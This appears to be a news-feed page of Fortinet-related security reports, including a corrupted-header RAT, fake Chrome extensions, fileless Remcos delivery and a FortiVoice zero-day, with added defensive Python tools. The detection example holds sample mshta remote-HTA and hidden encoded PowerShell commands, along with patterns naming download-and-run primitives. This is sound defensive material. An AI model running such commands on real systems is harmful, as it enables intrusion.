• AI powering a “dramatic surge” in cyberthreats as automated scans hit 36,000 per second

    New research from Fortinet reveals a worrying rise in cyberattacks powered by AI.
    WWW.TECHRADAR.COM
  • New Windows RAT Evades Detection for Weeks Using Corrupted DOS and PE Headers

    May 29, 2025Ravie LakshmananMalware / Windows Security

    Cybersecurity researchers have taken the wraps off an unusual cyber attack that leveraged malware with corrupted DOS and PE headers, according to new findings from Fortinet.
    The DOS (Disk Operating System) and PE (Portable Executable) headers are essential parts of a Windows PE file, providing information about the executable.
    While the DOS header makes the executable backward compatible with MS-DOS and lets the operating system recognize it as a valid executable, the PE header contains the metadata Windows needs to load and execute the program.

    "We discovered malware that had been running on a compromised machine for several weeks," researchers Xiaopeng Zhang and John Simmons from the FortiGuard Incident Response Team said in a report shared with The Hacker News. "The threat actor had executed a batch of scripts and PowerShell to run the malware in a Windows process."
    Fortinet said while it was unable to extract the malware itself, it acquired a memory dump of the running malware process and a full memory dump of the compromised machine. It's currently not known how the malware is distributed or how widespread the attacks distributing it are.
    The malware, running within a dllhost.exe process, is a 64-bit PE file whose DOS and PE headers were deliberately corrupted to hinder analysis and make it harder to reconstruct the payload from memory.

    Despite these roadblocks, the cybersecurity company further noted that it was able to take apart the dumped malware within a controlled local setting by replicating the compromised system's environment after "multiple trials, errors, and repeated fixes."
    The malware, once executed, decrypts command-and-control (C2) domain information stored in memory and then establishes contact with the server ("rushpapers[.]com") in a newly created thread.
    "After launching the thread, the main thread enters a sleep state until the communication thread completes its execution," the researchers said. "The malware communicates with the C2 server over the TLS protocol."

    Further analysis has determined the malware to be a remote access trojan (RAT) with capabilities to capture screenshots; enumerate and manipulate the system services on the compromised host; and even act as a server to await incoming "client" connections.
    "It implements a multi-threaded socket architecture: each time a new client (attacker) connects, the malware spawns a new thread to handle the communication," Fortinet said. "This design enables concurrent sessions and supports more complex interactions."
    "By operating in this mode, the malware effectively turns the compromised system into a remote-access platform, allowing the attacker to launch further attacks or perform various actions on behalf of the victim."

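    Added example, not code from the Fortinet report (which does not say which header bytes were damaged): a small Python triage routine for a PE image dumped from memory whose DOS and PE headers have been wiped. A strict parse fails, so the routine scans for the IMAGE_FILE_HEADER by its invariants (a known Machine value, a SizeOfOptionalHeader that matches the optional-header Magic right after it, printable section names), rebuilds only the MZ signature, e_lfanew and the PE signature, and parses again. The sample image and the corruption model (zeroing the first 0x40 bytes and the 4-byte PE signature) are constructed for the demonstration.

```python
import struct

# Constants from the PE format (winnt.h).
IMAGE_DOS_SIGNATURE = 0x5A4D      # 'MZ'
IMAGE_NT_SIGNATURE = 0x00004550   # 'PE\0\0'
MACHINES = {0x8664: 'x64', 0x014C: 'x86'}
OPT_MAGIC = {0x20B: 0xF0, 0x10B: 0xE0}   # PE32+ / PE32 -> expected SizeOfOptionalHeader
FILE_HDR = '<HHIIIHH'          # IMAGE_FILE_HEADER (20 bytes, follows the 4-byte signature)
SECTION_HDR = '<8sIIIIIIHHI'   # IMAGE_SECTION_HEADER (40 bytes)


def build_sample_image():
    """Constructed test data: a minimal 64-bit PE image with one '.text' section.
    Not a real binary, just enough header structure to exercise the checks."""
    e_lfanew = 0x80
    image = bytearray(0x600)
    struct.pack_into('<H', image, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into('<I', image, 0x3C, e_lfanew)
    struct.pack_into('<I', image, e_lfanew, IMAGE_NT_SIGNATURE)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    struct.pack_into(FILE_HDR, image, e_lfanew + 4, 0x8664, 1, 0, 0, 0, 0xF0, 0x22)
    opt = e_lfanew + 24
    struct.pack_into('<H', image, opt, 0x20B)              # Magic: PE32+
    struct.pack_into('<I', image, opt + 16, 0x1000)        # AddressOfEntryPoint
    struct.pack_into('<Q', image, opt + 24, 0x140000000)   # ImageBase
    struct.pack_into('<I', image, opt + 56, 0x2000)        # SizeOfImage
    struct.pack_into(SECTION_HDR, image, opt + 0xF0, b'.text',
                     0x200, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    return bytes(image)


def parse_headers(image):
    """Strict parse, the way a loader or a naive dump tool would: fails on any corruption."""
    if struct.unpack_from('<H', image, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError('bad DOS signature')
    e_lfanew = struct.unpack_from('<I', image, 0x3C)[0]
    if e_lfanew + 26 > len(image) or struct.unpack_from('<I', image, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError('bad PE signature')
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from(FILE_HDR, image, e_lfanew + 4)
    magic = struct.unpack_from('<H', image, e_lfanew + 24)[0]
    entry = struct.unpack_from('<I', image, e_lfanew + 24 + 16)[0]
    sections, off = [], e_lfanew + 24 + opt_size
    for _ in range(nsec):
        name, vsize, va, *_ = struct.unpack_from(SECTION_HDR, image, off)
        sections.append((name.rstrip(b'\0').decode('ascii', 'replace'), va, vsize))
        off += 40
    return {'machine': MACHINES.get(machine, hex(machine)), 'magic': magic,
            'entry': entry, 'sections': sections}


def corrupt_headers(image):
    """Assumed corruption model: wipe the whole DOS header and the 'PE\\0\\0' signature,
    leaving IMAGE_FILE_HEADER, the optional header and the section table intact."""
    damaged = bytearray(image)
    e_lfanew = struct.unpack_from('<I', image, 0x3C)[0]
    damaged[0:0x40] = b'\0' * 0x40
    damaged[e_lfanew:e_lfanew + 4] = b'\0' * 4
    return bytes(damaged)


def find_nt_headers(image):
    """Heuristic scan for IMAGE_FILE_HEADER when both signatures are gone. Returns the
    offset where 'PE\\0\\0' would sit, or None if nothing plausible is found."""
    for off in range(0, len(image) - 26, 4):
        machine, nsec, _, _, _, opt_size, _ = struct.unpack_from(FILE_HDR, image, off + 4)
        if machine not in MACHINES or not 1 <= nsec <= 96:
            continue
        magic = struct.unpack_from('<H', image, off + 24)[0]
        if OPT_MAGIC.get(magic) != opt_size:
            continue
        sec = off + 24 + opt_size
        if sec + 40 * nsec > len(image):
            continue
        names = [struct.unpack_from('8s', image, sec + 40 * i)[0].rstrip(b'\0') for i in range(nsec)]
        if all(n and all(32 <= c < 127 for c in n) for n in names):
            return off
    return None


def repair_headers(image, nt_off):
    """Rebuild only what a parser needs: MZ signature, e_lfanew and the PE signature.
    The original DOS stub is not recoverable, and is not needed to analyse the image."""
    fixed = bytearray(image)
    struct.pack_into('<H', fixed, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into('<I', fixed, 0x3C, nt_off)
    struct.pack_into('<I', fixed, nt_off, IMAGE_NT_SIGNATURE)
    return bytes(fixed)


def triage(image):
    """Returns (status, headers) with status 'intact', 'repaired' or 'unrecoverable'."""
    try:
        return 'intact', parse_headers(image)
    except ValueError:
        pass
    nt_off = find_nt_headers(image)
    if nt_off is None:
        return 'unrecoverable', None
    return 'repaired', parse_headers(repair_headers(image, nt_off))


if __name__ == '__main__':
    clean = build_sample_image()
    print(triage(clean))
    print(triage(corrupt_headers(clean)))
```

    The scan deliberately keys on fields an attacker has to leave intact for the image to keep running in memory (Machine, the optional-header Magic, the section table); wiping those would break the malware itself, which is why the report's authors could still rebuild the sample after "multiple trials, errors, and repeated fixes". On a real full-memory dump, run the scan over each private executable region of the suspect process rather than over the whole file.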
    THEHACKERNEWS.COM
  • Warning! Malicious Chrome extensions found mimicking legit tools

    Security researchers from Domain Tools warn that there are hundreds of Chrome extensions stealing data and running malware on the sly, reports BleepingComputer.
    Many of the malicious extensions are riding the coattails of well-known brands such as Fortinet, YouTube, Deepseek AI, and Calendly, increasing the risk of users installing them and getting into trouble. Google has reportedly removed most of the targeted extensions from the Chrome Web Store, but some still remain at the time of writing.
    We saw something similar happen last month when a cybersecurity researcher at Secure Annex found numerous malicious Chrome extensions being spread via ads and scam sites. It’s yet another example of why you need to vet your browser extensions carefully.
    To be on the safe side, you should always check out all available reviews before downloading any extensions to your browser, and always double-check that you’re downloading the official one. If you think you’ve been hit, see our article on how to remove malicious Chrome extensions.
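    Added example, not from the PCWorld article: a Python audit of the extensions installed in a Chrome profile. Chrome unpacks Web Store extensions under the profile's Extensions directory as <id>/<version>/manifest.json (on Windows typically under %LOCALAPPDATA%\Google\Chrome\User Data\Default); the script reads each manifest, flags permissions that give an extension broad read or write access to browsing, and treats a brand name without a matching approved extension ID as possible impersonation, since a lookalike copies the name but cannot copy the ID. The APPROVED map and the three sample manifests are placeholders constructed for the demo; real IDs must come from your own review of the Web Store listing.

```python
import json
import os
import tempfile

# Permissions that let an extension read or alter everything the user does in the browser.
HIGH_RISK = {'<all_urls>', 'webRequest', 'webRequestBlocking', 'cookies', 'scripting',
             'tabs', 'history', 'clipboardRead', 'nativeMessaging', 'debugger', 'proxy'}

# Hypothetical allowlist: brand keyword -> extension IDs the organisation has approved.
# These IDs are placeholders, not the real vendors' extension IDs.
APPROVED = {'fortinet': {'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'},
            'calendly': {'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'}}


def load_manifests(extensions_dir):
    """Walk Chrome's on-disk layout <profile>/Extensions/<id>/<version>/manifest.json."""
    found = []
    for ext_id in sorted(os.listdir(extensions_dir)):
        id_dir = os.path.join(extensions_dir, ext_id)
        if not os.path.isdir(id_dir):
            continue
        for version in sorted(os.listdir(id_dir)):
            path = os.path.join(id_dir, version, 'manifest.json')
            if os.path.isfile(path):
                with open(path, encoding='utf-8') as f:
                    found.append((ext_id, json.load(f)))
    return found


def is_broad_host(pattern):
    """A wildcard host pattern grants the same reach as <all_urls>."""
    return pattern == '<all_urls>' or pattern.startswith(('*://*/', 'http://*/', 'https://*/'))


def audit(ext_id, manifest):
    """Findings for one extension: risky permissions, plus a brand-impersonation check
    (name contains a watched brand but the ID is not on the approved list)."""
    perms = set(manifest.get('permissions', [])) | set(manifest.get('host_permissions', []))
    flagged = sorted(p for p in perms if p in HIGH_RISK or is_broad_host(p))
    name = manifest.get('name', '')
    impersonates = [brand for brand, ids in APPROVED.items()
                    if brand in name.lower() and ext_id not in ids]
    return {'id': ext_id, 'name': name, 'risky_permissions': flagged,
            'impersonates': impersonates}


def run_audit(extensions_dir):
    return [audit(ext_id, m) for ext_id, m in load_manifests(extensions_dir)]


def make_sample_profile():
    """Constructed sample data: three extensions written to a temp dir in Chrome's layout."""
    root = tempfile.mkdtemp()
    samples = {
        'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa': {'name': 'Fortinet Helper', 'version': '1.0',
                                             'permissions': ['storage']},
        'cccccccccccccccccccccccccccccccc': {'name': 'Fortinet VPN Assistant', 'version': '2.1',
                                             'permissions': ['cookies', 'webRequest', 'storage'],
                                             'host_permissions': ['<all_urls>']},
        'dddddddddddddddddddddddddddddddd': {'name': 'Dark Theme', 'version': '0.3',
                                             'permissions': ['storage']},
    }
    for ext_id, manifest in samples.items():
        d = os.path.join(root, ext_id, manifest['version'] + '_0')
        os.makedirs(d)
        with open(os.path.join(d, 'manifest.json'), 'w', encoding='utf-8') as f:
            json.dump(manifest, f)
    return root


if __name__ == '__main__':
    for finding in run_audit(make_sample_profile()):
        if finding['risky_permissions'] or finding['impersonates']:
            print(finding)
```

    Point it at a real profile with run_audit(path_to_Extensions). The brand check is the part reviews cannot give you: two extensions can carry the same name and icon, but only the approved one carries the approved ID.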
    WWW.PCWORLD.COM
  • Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks

    May 16, 2025Ravie LakshmananMalware / Cyber Attack

    Cybersecurity researchers have shed light on a new malware campaign that makes use of a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT.
    "Threat actors delivered malicious LNK files embedded within ZIP archives, often disguised as Office documents," Qualys security researcher Akshay Thorve said in a technical report. "The attack chain leverages mshta.exe for proxy execution during the initial stage."
    The latest wave of attacks, as detailed by Qualys, employs tax-related lures to entice users into opening a malicious ZIP archive containing a Windows shortcut (LNK) file, which, in turn, makes use of mshta.exe, a legitimate Microsoft tool used to run HTML Applications (HTA).
    The binary is used to execute an obfuscated HTA file named "xlab22.hta" hosted on a remote server, which incorporates Visual Basic Script code to download a PowerShell script, a decoy PDF, and another HTA file similar to xlab22.hta called "311.hta." The HTA file is also configured to make Windows Registry modifications to ensure that "311.hta" is automatically launched upon system startup.
    Once the PowerShell script is executed, it decodes and reconstructs a shellcode loader that ultimately proceeds to launch the Remcos RAT payload entirely in memory.
    Remcos RAT is a well-known malware that offers threat actors full control over compromised systems, making it an ideal tool for cyber espionage and data theft. A 32-bit binary compiled using Visual Studio C++ 8, it features a modular structure and can gather system metadata, log keystrokes, capture screenshots, monitor clipboard data, and retrieve a list of all installed programs and running processes.

    In addition, it establishes a TLS connection to a command-and-control (C2) server at "readysteaurants[.]com," maintaining a persistent channel for data exfiltration and control.
    This is not the first time fileless versions of Remcos RAT have been spotted in the wild. In November 2024, Fortinet FortiGuard Labs detailed a phishing campaign that filelessly deployed the malware by making use of order-themed lures.
    What makes the attack method attractive to threat actors is that it allows them to operate undetected by many traditional security solutions as the malicious code runs directly in the computer's memory, leaving very few traces on the disk.
    "The rise of PowerShell-based attacks like the new Remcos RAT variant demonstrates how threat actors are evolving to evade traditional security measures," J Stephen Kowski, Field CTO at SlashNext, said.
    "This fileless malware operates directly in memory, using LNK files and MSHTA.exe to execute obfuscated PowerShell scripts that can bypass conventional defenses. Advanced email security that can detect and block malicious LNK attachments before they reach users is crucial, as is real-time scanning of PowerShell commands for suspicious behaviors."

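    Added example, not from the Qualys report: Python detection logic for the chain described above (a shortcut launches mshta.exe with a remote HTA, mshta.exe spawns PowerShell with hidden/encoded arguments, a Run key re-launches a local .hta at startup), run over a handful of constructed Sysmon-style process-creation and registry events. The paths, the URL (example.invalid) and the PIDs are placeholders; the rules are a starting point for an EDR or SIEM query, not a signature for this specific campaign.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape: id 1 = process creation,
# id 13 = registry value set. Not real logs; paths, URL and PIDs are placeholders.
EVENTS = [
    {'id': 1, 'pid': 4100, 'ppid': 1200, 'image': r'C:\Windows\explorer.exe',
     'cmdline': 'explorer.exe'},
    {'id': 1, 'pid': 5208, 'ppid': 4100, 'image': r'C:\Windows\System32\mshta.exe',
     'cmdline': 'mshta.exe http://example.invalid/xlab22.hta'},
    {'id': 1, 'pid': 5320, 'ppid': 5208,
     'image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'cmdline': 'powershell.exe -w hidden -ep bypass -enc SQBFAFgA'},
    {'id': 13, 'pid': 5208, 'image': r'C:\Windows\System32\mshta.exe',
     'target': r'HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater',
     'details': r'mshta.exe C:\Users\victim\AppData\Roaming\311.hta'},
    {'id': 1, 'pid': 6000, 'ppid': 4100, 'image': r'C:\Windows\System32\mshta.exe',
     'cmdline': r'mshta.exe C:\Program Files\Vendor\setup.hta'},   # local HTA: lower confidence
    {'id': 1, 'pid': 6100, 'ppid': 4100, 'image': r'C:\Windows\System32\notepad.exe',
     'cmdline': 'notepad.exe'},
]

URL_RE = re.compile(r'https?://', re.I)
# Encoded command, hidden window, or download-and-run primitives on the command line.
PS_SUSPICIOUS = re.compile(
    r'(-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring|\biex\b|invoke-expression)',
    re.I)
HTA_RE = re.compile(r'(\.hta\b|\bmshta)', re.I)


def basename(path):
    return path.rsplit('\\', 1)[-1].lower()


def ancestry(pid, by_pid, depth=5):
    """Walk parent links to render e.g. 'explorer.exe > mshta.exe > powershell.exe'."""
    chain = []
    while pid in by_pid and depth > 0:
        chain.append(basename(by_pid[pid]['image']))
        pid = by_pid[pid]['ppid']
        depth -= 1
    return ' > '.join(reversed(chain))


def detect(events):
    by_pid = {e['pid']: e for e in events if e['id'] == 1}
    alerts = []

    def alert(severity, rule, pid):
        alerts.append({'severity': severity, 'rule': rule, 'pid': pid,
                       'chain': ancestry(pid, by_pid)})

    for e in events:
        if e['id'] == 1:
            image = basename(e['image'])
            parent = basename(by_pid.get(e['ppid'], {}).get('image', ''))
            if image == 'mshta.exe':
                if URL_RE.search(e['cmdline']):                 # proxy execution of a remote HTA
                    alert('high', 'mshta.exe loading remote HTA', e['pid'])
                elif parent in ('explorer.exe', 'cmd.exe'):     # typical for a double-clicked LNK
                    alert('medium', 'mshta.exe launched from shell', e['pid'])
            elif image in ('powershell.exe', 'pwsh.exe'):
                if parent == 'mshta.exe':
                    alert('high', 'PowerShell spawned by mshta.exe', e['pid'])
                elif PS_SUSPICIOUS.search(e['cmdline']):
                    alert('medium', 'PowerShell with encoded/hidden/download arguments', e['pid'])
        elif e['id'] == 13:
            if r'\currentversion\run' in e['target'].lower() and HTA_RE.search(e['details']):
                alert('high', 'Run-key persistence via HTA', e['pid'])
    return alerts


if __name__ == '__main__':
    for a in detect(EVENTS):
        print(f"[{a['severity']}] {a['rule']} (pid {a['pid']}): {a['chain']}")
```

    The parent-child relationships carry most of the signal: mshta.exe and PowerShell are both signed Microsoft binaries, so file-based controls never fire, but a legitimate HTA is rarely fetched over HTTP and almost never spawns a hidden, encoded PowerShell. Script Block Logging (Event 4104) is the place to pick up the decoded shellcode loader once it runs.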
    The disclosure comes as Palo Alto Networks Unit 42 and Threatray detailed a new .NET loader that's used to detonate a wide range of commodity information stealers and RATs like Agent Tesla, NovaStealer, Remcos RAT, VIPKeylogger, XLoader, and XWorm.
    The loader features three stages that work in tandem to deploy the final-stage payload: A .NET executable that embeds the second and third stages in encrypted form, a .NET DLL that decrypts and loads the next stage, and a .NET DLL that manages the deployment of the main malware.
    "While earlier versions embedded the second stage as a hardcoded string, more recent versions use a bitmap resource," Threatray said. "The first stage extracts and decrypts this data, then executes it in memory to launch the second stage."
    Unit 42 described the use of bitmap resources to conceal malicious payloads as a steganography technique that can bypass traditional security mechanisms and evade detection.
    The findings also coincide with the emergence of several phishing and social engineering campaigns that are engineered for credential theft and malware delivery -

    Use of trojanized versions of the KeePass password management software – codenamed KeeLoader – to drop a Cobalt Strike beacon and steal sensitive KeePass database data, including administrative credentials. The malicious installers are hosted on KeePass typosquat domains that are served via Bing ads.
    Use of ClickFix lures and URLs embedded within PDF documents and a series of intermediary dropper URLs to deploy Lumma Stealer.
    Use of booby-trapped Microsoft Office documents that are used to deploy the Formbook information stealer protected using a malware distribution service referred to as Horus Protector.
    Use of blob URIs to locally load a credential phishing page via phishing emails, with the blob URIs served using allow-listed pages (e.g., onedrive.live[.]com) that are abused to redirect victims to a malicious site that contains a link to a threat actor-controlled HTML page.
    Use of RAR archives masquerading as setup files to distribute NetSupport RAT in attacks targeting Ukraine and Poland.
    Use of phishing emails to distribute HTML attachments that contain malicious code to capture victims' Outlook, Hotmail, and Gmail credentials and exfiltrate them to a Telegram bot named "Blessed logs" that has been active since February 2025.

    The developments have also been complemented by the rise in artificial intelligence (AI)-powered campaigns that leverage polymorphic tricks that mutate in real time to sidestep detection efforts. These include modifying email subject lines, sender names, and body content to slip past signature-based detection.
    "AI gave threat actors the power to automate malware development, scale attacks across industries, and personalize phishing messages with surgical precision," Cofense said.
    "These evolving threats are increasingly able to bypass traditional email filters, highlighting the failure of perimeter-only defenses and the need for post-delivery detection. It also enabled them to outmaneuver traditional defenses through polymorphic phishing campaigns that shift content on the fly. The result: deceptive messages that are increasingly difficult to detect and even harder to stop."

    THEHACKERNEWS.COM
    Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks
    May 16, 2025Ravie LakshmananMalware / Cyber Attack Cybersecurity researchers have shed light on a new malware campaign that makes use of a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT. "Threat actors delivered malicious LNK files embedded within ZIP archives, often disguised as Office documents," Qualys security researcher Akshay Thorve said in a technical report. "The attack chain leverages mshta.exe for proxy execution during the initial stage." The latest wave of attacks, as detailed by Qualys, employs tax-related lures to entice users into opening a malicious ZIP archive containing a Windows shortcut (LNK) file, which, in turn, makes use of mshta.exe, a legitimate Microsoft tool used to run HTML Applications (HTA). The binary is used to execute an obfuscated HTA file named "xlab22.hta" hosted on a remote server, which incorporates Visual Basic Script code to download a PowerShell script, a decoy PDF, and another HTA file similar to xlab22.hta called "311.hta." The HTA file is also configured to make Windows Registry modifications to ensure that "311.hta" is automatically launched upon system startup. Once the PowerShell script is executed, it decodes and reconstructs a shellcode loader that ultimately proceeds to launch the Remcos RAT payload entirely in memory. Remcos RAT is a well-known malware that offers threat actors full control over compromised systems, making it an ideal tool for cyber espionage and data theft. A 32-bit binary compiled using Visual Studio C++ 8, it features a modular structure and can gather system metadata, log keystrokes, capture screenshots, monitor clipboard data, and retrieve a list of all installed programs and running processes. In addition, it establishes a TLS connection to a command-and-control (C2) server at "readysteaurants[.]com," maintaining a persistent channel for data exfiltration and control. 
This is not the first time fileless versions of Remcos RAT have been spotted in the wild. In November 2024, Fortinet FortiGuard Labs detailed a phishing campaign that filelessly deployed the malware by making use of order-themed lures. What makes the attack method attractive to threat actors is that it allows them to operate undetected by many traditional security solutions, as the malicious code runs directly in the computer's memory, leaving very few traces on disk.

"The rise of PowerShell-based attacks like the new Remcos RAT variant demonstrates how threat actors are evolving to evade traditional security measures," J Stephen Kowski, Field CTO at SlashNext, said. "This fileless malware operates directly in memory, using LNK files and MSHTA.exe to execute obfuscated PowerShell scripts that can bypass conventional defenses. Advanced email security that can detect and block malicious LNK attachments before they reach users is crucial, as is real-time scanning of PowerShell commands for suspicious behaviors."

The disclosure comes as Palo Alto Networks Unit 42 and Threatray detailed a new .NET loader that's used to detonate a wide range of commodity information stealers and RATs like Agent Tesla, NovaStealer, Remcos RAT, VIPKeylogger, XLoader, and XWorm. The loader features three stages that work in tandem to deploy the final-stage payload: a .NET executable that embeds the second and third stages in encrypted form, a .NET DLL that decrypts and loads the next stage, and a .NET DLL that manages the deployment of the main malware.

"While earlier versions embedded the second stage as a hardcoded string, more recent versions use a bitmap resource," Threatray said. "The first stage extracts and decrypts this data, then executes it in memory to launch the second stage." Unit 42 described the use of bitmap resources to conceal malicious payloads as a steganography technique that can bypass traditional security mechanisms and evade detection.

The findings also coincide with the emergence of several phishing and social engineering campaigns that are engineered for credential theft and malware delivery:

- Use of trojanized versions of the KeePass password management software, codenamed KeeLoader, to drop a Cobalt Strike beacon and steal sensitive KeePass database data, including administrative credentials. The malicious installers are hosted on KeePass typosquat domains that are served via Bing ads.
- Use of ClickFix lures and URLs embedded within PDF documents and a series of intermediary dropper URLs to deploy Lumma Stealer.
- Use of booby-trapped Microsoft Office documents to deploy the Formbook information stealer, protected using a malware distribution service referred to as Horus Protector.
- Use of blob URIs to locally load a credential phishing page via phishing emails, with the blob URIs served using allow-listed pages (e.g., onedrive.live[.]com) that are abused to redirect victims to a malicious site that contains a link to a threat actor-controlled HTML page.
- Use of RAR archives masquerading as setup files to distribute NetSupport RAT in attacks targeting Ukraine and Poland.
- Use of phishing emails to distribute HTML attachments that contain malicious code to capture victims' Outlook, Hotmail, and Gmail credentials and exfiltrate them to a Telegram bot named "Blessed logs" that has been active since February 2025.

The developments have also been complemented by the rise in artificial intelligence (AI)-powered campaigns that leverage polymorphic tricks that mutate in real time to sidestep detection efforts. These include modifying email subject lines, sender names, and body content to slip past signature-based detection.

"AI gave threat actors the power to automate malware development, scale attacks across industries, and personalize phishing messages with surgical precision," Cofense said. "These evolving threats are increasingly able to bypass traditional email filters, highlighting the failure of perimeter-only defenses and the need for post-delivery detection. It also enabled them to outmaneuver traditional defenses through polymorphic phishing campaigns that shift content on the fly. The result: deceptive messages that are increasingly difficult to detect and even harder to stop."
  • Fortinet Patches CVE-2025-32756 Zero-Day RCE Flaw Exploited in FortiVoice Systems

    May 14, 2025Ravie LakshmananVulnerability / Network Security
    Fortinet has patched a critical security flaw that it said has been exploited as a zero-day in attacks targeting FortiVoice enterprise phone systems.
    The vulnerability, tracked as CVE-2025-32756, carries a CVSS score of 9.6 out of 10.0.
    "A stack-based overflow vulnerability [CWE-121] in FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera may allow a remote unauthenticated attacker to execute arbitrary code or commands via crafted HTTP requests," the company said in an advisory.
    The company said it observed the flaw being exploited in the wild on FortiVoice systems, but did not disclose the scale of the attacks and the identity of the threat actors behind them.
    It further noted that the threat actor performed device network scans, erased system crash logs, and enabled fcgi debugging to log credentials from the system or SSH login attempts.
    The issue affects the following products and versions:
    - FortiCamera 1.1, 2.0 (Migrate to a fixed release)
    - FortiCamera 2.1.x (Upgrade to 2.1.4 or above)
    - FortiMail 7.0.x (Upgrade to 7.0.9 or above)
    - FortiMail 7.2.x (Upgrade to 7.2.8 or above)
    - FortiMail 7.4.x (Upgrade to 7.4.5 or above)
    - FortiMail 7.6.x (Upgrade to 7.6.3 or above)
    - FortiNDR 1.1, 1.2, 1.3, 1.4, 1.5, 7.1 (Migrate to a fixed release)
    - FortiNDR 7.0.x (Upgrade to 7.0.7 or above)
    - FortiNDR 7.2.x (Upgrade to 7.2.5 or above)
    - FortiNDR 7.4.x (Upgrade to 7.4.8 or above)
    - FortiNDR 7.6.x (Upgrade to 7.6.1 or above)
    - FortiRecorder 6.4.x (Upgrade to 6.4.6 or above)
    - FortiRecorder 7.0.x (Upgrade to 7.0.6 or above)
    - FortiRecorder 7.2.x (Upgrade to 7.2.4 or above)
    - FortiVoice 6.4.x (Upgrade to 6.4.11 or above)
    - FortiVoice 7.0.x (Upgrade to 7.0.7 or above)
    - FortiVoice 7.2.x (Upgrade to 7.2.1 or above)
    Fortinet said the vulnerability was discovered by its product security team based on threat actor activity that originated from the following IP addresses:
    - 198.105.127.124
    - 43.228.217.173
    - 43.228.217.82
    - 156.236.76.90
    - 218.187.69.244
    - 218.187.69.59
    Users of FortiVoice, FortiMail, FortiNDR, FortiRecorder and FortiCamera are recommended to apply the necessary fixes to secure their devices from active exploitation attempts.
    If immediate patching is not an option, it's advised to disable the HTTP/HTTPS administrative interface as a temporary workaround.
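The version table and IoC addresses above are exactly what a defender turns into a quick triage script: which devices in an inventory fall on a branch the advisory lists, whether each is at or above the fixed build (or on a branch with no fixed build, where the advice is to migrate), and whether any management-plane log lines carry the source IPs Fortinet attributed to the activity. The following is an added example, not Fortinet's own tooling; the fixed-release table and IP set are transcribed from the advisory text above, while the device inventory and log lines are constructed sample data.

```python
import re

# Fixed releases per product branch, transcribed from the advisory above.
# None means the advisory says "Migrate to a fixed release" for that branch.
FIXED_RELEASES = {
    "FortiCamera": {"1.1": None, "2.0": None, "2.1": "2.1.4"},
    "FortiMail": {"7.0": "7.0.9", "7.2": "7.2.8", "7.4": "7.4.5", "7.6": "7.6.3"},
    "FortiNDR": {"1.1": None, "1.2": None, "1.3": None, "1.4": None, "1.5": None,
                 "7.1": None, "7.0": "7.0.7", "7.2": "7.2.5", "7.4": "7.4.8",
                 "7.6": "7.6.1"},
    "FortiRecorder": {"6.4": "6.4.6", "7.0": "7.0.6", "7.2": "7.2.4"},
    "FortiVoice": {"6.4": "6.4.11", "7.0": "7.0.7", "7.2": "7.2.1"},
}

# Source IPs the advisory attributes to the threat actor activity.
IOC_IPS = {
    "198.105.127.124", "43.228.217.173", "43.228.217.82",
    "156.236.76.90", "218.187.69.244", "218.187.69.59",
}


def parse_version(version):
    """'7.0.6' -> (7, 0, 6). Tolerates a trailing build tag such as '7.0.6-build0123'."""
    core = re.match(r"\d+(?:\.\d+)*", version.strip())
    if not core:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(p) for p in core.group(0).split("."))


def assess(product, version):
    """Return (status, action) for one device against the advisory table.

    Numeric tuple comparison is used so 7.4.10 correctly sorts above 7.4.5,
    which a plain string comparison would get wrong.
    """
    table = FIXED_RELEASES.get(product)
    if table is None:
        return ("unknown-product", "product not covered by this advisory")
    parsed = parse_version(version)
    branch = ".".join(str(p) for p in parsed[:2])
    if branch not in table:
        return ("not-listed", f"branch {branch} not listed in advisory")
    fixed = table[branch]
    if fixed is None:
        return ("vulnerable", "migrate to a fixed release")
    if parsed >= parse_version(fixed):
        return ("fixed", f"at or above {fixed}")
    return ("vulnerable", f"upgrade to {fixed} or above")


def check_inventory(devices):
    """devices: iterable of (hostname, product, version) -> list of (hostname, status, action)."""
    return [(host, *assess(product, version)) for host, product, version in devices]


IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def find_ioc_hits(log_lines):
    """Return (ip, line) pairs for every log line containing an advisory IoC address."""
    hits = []
    for line in log_lines:
        for ip in IP_RE.findall(line):
            if ip in IOC_IPS:
                hits.append((ip, line))
    return hits


# Constructed sample inventory (hypothetical hostnames and versions).
SAMPLE_DEVICES = [
    ("pbx-01", "FortiVoice", "7.0.6"),
    ("pbx-02", "FortiVoice", "7.0.7"),
    ("mail-01", "FortiMail", "7.4.10"),
    ("ndr-01", "FortiNDR", "7.1.0"),
    ("fw-01", "FortiGate", "7.4.1"),
]

# Constructed sample admin-interface log lines (not real captured data).
SAMPLE_LOG = [
    "2025-05-12T03:14:07Z pbx-01 httpd: POST /remote/login from 198.105.127.124",
    "2025-05-12T03:15:22Z pbx-01 httpd: GET /admin from 10.20.30.40",
    "2025-05-12T03:16:41Z pbx-01 sshd: failed login from 218.187.69.59",
]

if __name__ == "__main__":
    for row in check_inventory(SAMPLE_DEVICES):
        print(row)
    for ip, line in find_ioc_hits(SAMPLE_LOG):
        print("IoC hit:", ip, "|", line)
```

A device reported as `not-listed` (a branch the advisory does not name) or `unknown-product` is not cleared by this check; it simply means the advisory text above says nothing about it and the vendor's own advisory should be consulted directly.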
    Source: https://thehackernews.com/2025/05/fortinet-patches-cve-2025-32756-zero.html
    #fortinet #patches #cve202532756 #zeroday #rce #flaw #exploited #fortivoice #systems
